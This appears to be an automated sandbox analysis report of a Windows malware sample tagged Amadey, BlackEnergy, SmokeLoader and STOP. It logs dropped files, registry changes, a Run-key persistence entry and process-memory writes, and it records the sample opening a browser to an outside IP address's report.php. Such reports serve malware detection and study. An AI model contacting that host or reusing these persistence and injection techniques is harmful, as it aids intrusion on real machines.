File created | C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\r\audit.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\x86_netfx4-aspnet_wp_exe_b03f5f7f11d50a3a_4.0.15806.256_none_4e9ea93e588a5995\aspnet_wp.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\r\wifitask.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-findstr_31bf3856ad364e35_10.0.22000.1_none_87c7d35a92de7cef\findstr.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-ftp_31bf3856ad364e35_10.0.22000.1_none_0d83a5e891b3d321\ftp.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-sharedfoldersui_31bf3856ad364e35_10.0.22000.1_none_18b57cd06ab48849\shrpubw.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_b4a3a74a80427a96\r\CheckNetIsolation.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-aarsvc_31bf3856ad364e35_10.0.22000.1_none_b9334c2faa2133a2\agentactivationruntimestarter.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_6b2d7072c225a87c\r\WerFault.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-gdi_31bf3856ad364e35_10.0.22000.132_none_a52f79fedfba2bb3\fontdrvhost.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-smss-minwin_31bf3856ad364e35_10.0.22000.1_none_d4a473e8ed9480cf\smss.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_f698302c22284569\r\XGpuEjectDialog.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.22000.318_none_2bc95a47eaa37094\hvax64.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.22000.1_none_3b89d92484239859\psr.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\r\Taskmgr.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.22000.1_none_fe52560879e25943\RpcPing.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..cecontroller-minwin_31bf3856ad364e35_10.0.22000.51_none_2158495b1874d95c\f\services.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\Taskmgr.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-onecore-pnp-drvinst_31bf3856ad364e35_10.0.22000.1_none_aba17b366eb3e321\drvinst.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..t-bytecodegenerator_31bf3856ad364e35_10.0.22000.71_none_c26272ecb066f6ab\ByteCodeGenerator.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..ment-windows-minwin_31bf3856ad364e35_10.0.22000.318_none_4b63ad41811cb76d\f\winload.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsdiag_31bf3856ad364e35_10.0.22000.434_none_478d6c55833b17ab\dcdiag.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\f\Narrator.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.22000.1_none_03f10908532480fe\PickerHost.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\f\PinningConfirmationDialog.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..auncher-cmdlinetool_31bf3856ad364e35_10.0.22000.1_none_4d8388bf67ce9090\pwlauncher.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\PinningConfirmationDialog.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\msil_addinprocess_b77a5c561934e089_10.0.22000.1_none_f1c351dedf09f213\AddInProcess.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-wmi-core-svc_31bf3856ad364e35_10.0.22000.1_none_014b03c8301af3f9\WinMgmt.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchIndexer.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\CredDialogHost.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-deviceenroller_31bf3856ad364e35_10.0.22000.469_none_bc884b259290e3bf\r\DeviceEnroller.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\PeopleExperienceHost.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.22000.100_none_bac6834bfb16b20d\r\SecurityHealthSystray.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\sdchange.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-atbroker_31bf3856ad364e35_10.0.22000.1_none_25e44d77231e4b64\AtBroker.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsmgmt_31bf3856ad364e35_10.0.22000.434_none_4634d5a384238dfd\r\dsmgmt.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\x86_microsoft-windows-ie-feedsbs_31bf3856ad364e35_11.0.22000.1_none_2a646c04920783d6\msfeedssync.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..ice-daf-pospayments_31bf3856ad364e35_10.0.22000.1_none_abd5b42ed12df708\pospaymentsworker.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\f\RMActivate_isv.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet 
Explorer\BrowserEmulation\IECompatVersionLow = "395196024" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1853774386" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. 
See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" IEXPLORE.exe Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31190320" IEXPLORE.exe Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" IEXPLORE.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961046444521985" msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1418876453-2228697459-2788511057-1000\{485D920B-9929-4D58-BCA8-339A43C5A821} msedge.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4152 msedge.exe 4152 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe 5292 msedge.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5292 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3064 wrote to memory of 1184 3064 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe 78 PID 3064 wrote to memory of 1184 3064 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe 78 PID 1184 wrote to memory of 5292 1184 IEXPLORE.exe 79 PID 1184 wrote to memory of 5292 1184 IEXPLORE.exe 79 PID 5292 wrote to memory of 5444 5292 msedge.exe 80 PID 5292 wrote to memory of 5444 5292 msedge.exe 80 PID 5292 wrote to memory of 5136 5292 msedge.exe 81 PID 5292 wrote to memory of 5136 5292 msedge.exe 81 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 
4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 4896 5292 msedge.exe 82 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84 PID 5292 wrote to memory of 5000 5292 msedge.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Program Files\Internet Explorer\IEXPLORE.exe"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://212.33.237.86/images/1/report.php"3⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5292 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffcb88ff208,0x7ffcb88ff214,0x7ffcb88ff2204⤵PID:5444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:114⤵PID:5136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2136,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:24⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2532,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:134⤵PID:5000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:14⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3356,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3404 /prefetch:14⤵PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:144⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:144⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:144⤵PID:2616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:144⤵PID:3924
-
-
